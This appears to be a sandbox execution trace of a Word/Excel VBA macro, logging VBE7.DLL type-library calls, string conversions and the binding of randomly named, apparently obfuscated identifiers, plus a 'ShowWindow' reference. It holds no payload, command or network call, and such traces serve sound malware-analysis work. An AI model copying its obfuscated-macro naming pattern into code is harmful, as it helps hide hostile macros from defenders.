invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0070.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0070.042] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0070.042] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0070.042] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0070.042] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0070.042] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0070.042] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0070.042] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0070.042] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0070.042] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0070.042] IUnknown:Release (This=0x665ba50) returned 0xf [0070.042] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0070.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0070.042] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0070.042] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0070.042] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0070.042] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0070.042] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0070.043] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0070.043] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0070.043] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0070.043] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0070.043] IUnknown:Release (This=0x665ba50) returned 0xf [0070.043] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0070.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0070.043] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0070.043] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0070.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2832, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wDZ_QCDZ") returned 9 [0070.043] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wDZ_QCDZ", lHashVal=0x10e1be, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2832, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wDZ_QCDZ") returned 9 [0070.043] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wDZ_QCDZ", lHashVal=0x10e1be, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2832, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wDZ_QCDZ") returned 9 [0070.043] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wDZ_QCDZ", lHashVal=0x10e1be, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.043] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wDZ_QCDZ") returned 0x10e1be [0070.043] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="wDZ_QCDZ" | out: _Dst="wDZ_QCDZ") returned 0x0 [0070.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="wDZ_QCDZ") returned 9 [0070.043] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.043] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wDZ_QCDZ", lHashVal=0x10e1be, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.044] IUnknown:Release (This=0x665ba50) returned 0xf [0070.044] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wDZ_QCDZ", lHashVal=0x10e1be, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.044] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d20 [0070.044] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cb2832 | out: _Dst=0x67c2d20) returned 0x0 [0070.044] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_wDZ_QCDZ" | out: _Dst="_B_var_wDZ_QCDZ") returned 0x0 [0070.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_wDZ_QCDZ") returned 16 [0070.044] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wDZ_QCDZ", lHashVal=0x10b947, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x51005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x51005f00000000, pDummy=0x0) returned 0x0 [0070.044] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb2832 | out: _Dst=0x144ec0) returned 0x0 [0070.044] ITypeComp:RemoteBind (in: This=0x665ba60, szName="RAAA4AkA", lHashVal=0x1068a6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb292e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="RAAA4AkA") returned 9 [0070.044] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="RAAA4AkA", lHashVal=0x1068a6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb292e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="RAAA4AkA") returned 9 [0070.044] ITypeComp:RemoteBind (in: This=0x665bd30, szName="RAAA4AkA", lHashVal=0x1068a6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.045] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RAAA4AkA") returned 0x1068a6 [0070.045] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="RAAA4AkA" | out: _Dst="RAAA4AkA") returned 0x0 [0070.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="RAAA4AkA") returned 9 [0070.045] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="RAAA4AkA", lHashVal=0x1068a6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.045] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d20 [0070.045] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cb292e | out: _Dst=0x67c2d20) returned 0x0 [0070.045] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_RAAA4AkA" | out: _Dst="_B_var_RAAA4AkA") returned 0x0 [0070.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_RAAA4AkA") returned 16 [0070.045] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_RAAA4AkA", lHashVal=0x10402f, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x52005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x52005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0) returned 0x0 [0070.045] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb292e | out: _Dst=0x144ec0) returned 0x0 [0070.045] ITypeComp:RemoteBind (in: This=0x665ba60, szName="JUoAD_ZA", lHashVal=0x1089df, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2902, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="JUoAD_ZA") returned 9 [0070.045] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="JUoAD_ZA", lHashVal=0x1089df, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2902, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="JUoAD_ZA") returned 9 [0070.045] ITypeComp:RemoteBind (in: This=0x665bd30, szName="JUoAD_ZA", lHashVal=0x1089df, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.046] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JUoAD_ZA") returned 0x1089df [0070.046] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="JUoAD_ZA" | out: _Dst="JUoAD_ZA") returned 0x0 [0070.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="JUoAD_ZA") returned 9 [0070.046] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="JUoAD_ZA", lHashVal=0x1089df, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.046] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d20 [0070.046] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cb2902 | out: _Dst=0x67c2d20) returned 0x0 [0070.046] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_JUoAD_ZA" | out: _Dst="_B_var_JUoAD_ZA") returned 0x0 [0070.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_JUoAD_ZA") returned 16 [0070.046] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_JUoAD_ZA", lHashVal=0x106168, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0) returned 0x0 [0070.046] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb2902 | out: _Dst=0x144ec0) returned 0x0 [0070.046] ITypeComp:RemoteBind (in: This=0x665ba60, szName="XQAAAk", lHashVal=0x107ef0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2986, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="XQAAAk") returned 7 [0070.046] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="XQAAAk", lHashVal=0x107ef0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2986, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="XQAAAk") returned 7 [0070.047] ITypeComp:RemoteBind (in: This=0x665bd30, szName="XQAAAk", lHashVal=0x107ef0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.047] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XQAAAk") returned 0x107ef0 [0070.047] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="XQAAAk" | out: _Dst="XQAAAk") returned 0x0 [0070.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="XQAAAk") returned 7 [0070.047] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="XQAAAk", lHashVal=0x107ef0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.047] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d20 [0070.047] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb2986 | out: _Dst=0x67c2d20) returned 0x0 [0070.047] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_XQAAAk" | out: _Dst="_B_var_XQAAAk") returned 0x0 [0070.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_XQAAAk") returned 14 [0070.047] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_XQAAAk", lHashVal=0x10f999, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0070.047] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2986 | out: _Dst=0x144ec0) returned 0x0 [0070.047] ITypeComp:RemoteBind (in: This=0x665ba60, szName="cU4XAGkQ", lHashVal=0x1078bf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb29ae, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="cU4XAGkQ") returned 9 [0070.047] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="cU4XAGkQ", lHashVal=0x1078bf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb29ae, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="cU4XAGkQ") returned 9 [0070.048] ITypeComp:RemoteBind (in: This=0x665bd30, szName="cU4XAGkQ", lHashVal=0x1078bf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.048] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cU4XAGkQ") returned 0x1078bf [0070.048] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="cU4XAGkQ" | out: _Dst="cU4XAGkQ") returned 0x0 [0070.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="cU4XAGkQ") returned 9 [0070.048] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="cU4XAGkQ", lHashVal=0x1078bf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.048] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d20 [0070.048] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cb29ae | out: _Dst=0x67c2d20) returned 0x0 [0070.048] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_cU4XAGkQ" | out: _Dst="_B_var_cU4XAGkQ") returned 0x0 [0070.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_cU4XAGkQ") returned 16 [0070.048] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_cU4XAGkQ", lHashVal=0x105048, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x41005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x41005800000000, pDummy=0x0) returned 0x0 [0070.048] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb29ae | out: _Dst=0x144ec0) returned 0x0 [0070.048] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x412) returned 0x69fc000 [0070.048] wcscpy_s (in: _Destination=0xafdb8d8, _SizeInWords=0xb, _Source="ShowWindow" | out: _Destination="ShowWindow") returned 0x0 [0070.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb29da, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="rAUXUUDQ") returned 9 [0070.048] ITypeComp:RemoteBind (in: This=0x665ba60, szName="rAUXUUDQ", lHashVal=0x102f70, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb29da, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="rAUXUUDQ") returned 9 [0070.049] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="rAUXUUDQ", lHashVal=0x102f70, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, 